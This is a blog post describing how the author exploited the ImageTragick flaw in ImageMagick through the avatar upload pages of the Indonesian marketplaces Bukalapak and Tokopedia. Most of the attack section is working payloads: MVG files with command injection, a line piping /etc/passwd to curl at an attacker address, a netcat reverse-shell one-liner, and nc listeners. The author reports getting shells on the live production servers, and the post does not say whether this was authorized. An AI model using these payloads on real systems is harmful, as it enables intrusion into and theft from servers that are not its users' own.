How I Hacked Bukalapak and Tokopedia using Imagetragick

Published at 12 Jun 2016


So after I created CTF challenge on Botani CTF about imagetragick, I’m curious, are there any web apps that still vulnerable to this bug, then I started to test to well-known startups in Indonesia that are Bukalapak and Tokopedia. Bukalapak and Tokopedia are C2C marketplace in Indonesia where anyone can open online store to serve prospective buyer from all over Indonesia.

Imagetragick bug discovered 3 month ago by Nikolay Ermishkin. The bug affects imagemagick version 6.9.3 or lower. Basically, imagemagick will try to retrieve file (in this case an image) before conversion process if file provide url string, similar to SSRF bug except url parameter can be escaped to gain remote code execution due to url parameter not filtered properly. Here an example:

$ convert '";|ls "-la' tmp.png
total 32
drwxr-xr-x 6 hrdn hrdn 204 Jun 11 21:01 .
drwxr-xr-x 232 hrdn hrdn 7888 Jun 11 11:37 ..

When testing imagetragick bug I come around file upload feature, I want to try upload file mvg that contain my payload. These 2 startups provide file upload feature in profile page where user can upload avatar.

Step to reproduce

Create file avatar.jpg, we use mvg format which recognized by imagetragick.

push graphic-context
viewbox 0 0 640 480
fill 'url(";| [RCE HERE] | touch "hello)'
pop graphic-context

We can execute command and send the result using curl

push graphic-context
viewbox 0 0 640 480
fill 'url(";| cat /etc/passwd | curl -d @- [ip:port] | touch "hello'
pop graphic-context

First, we need to create listener using netcat on our server.

$ nc -lvp 9700
Listening on [] (family 0, port 9700)

Then, visit profile page and upload the payload avatar.jpg

profile page

Voila! we got feedback from Bukalapak server


Gaining reverse shell

We can construct reverse shell payload that provided by pentest-monkey, I personally use netcat reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip] [port] >/tmp/f

This time, we will try execute payload on Tokopedia. Just like Bukalapak, Tokopedia also vulnerable on avatar upload feature. Create file payload, avatar.jpg.

push graphic-context
viewbox 0 0 640 480
fill 'url(";| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [your ip] [your port] >/tmp/f | touch "hello'
pop graphic-context

And then create listener as above, port number doesn’t matter as long as its not collide to another program or below 1024 (reserved port number).

$ nc -lvp 31337
Listening on [] (family 0, port 31337)

Visit profile page and upload the payload

profile page

We got reverse shell


read /etc/passwd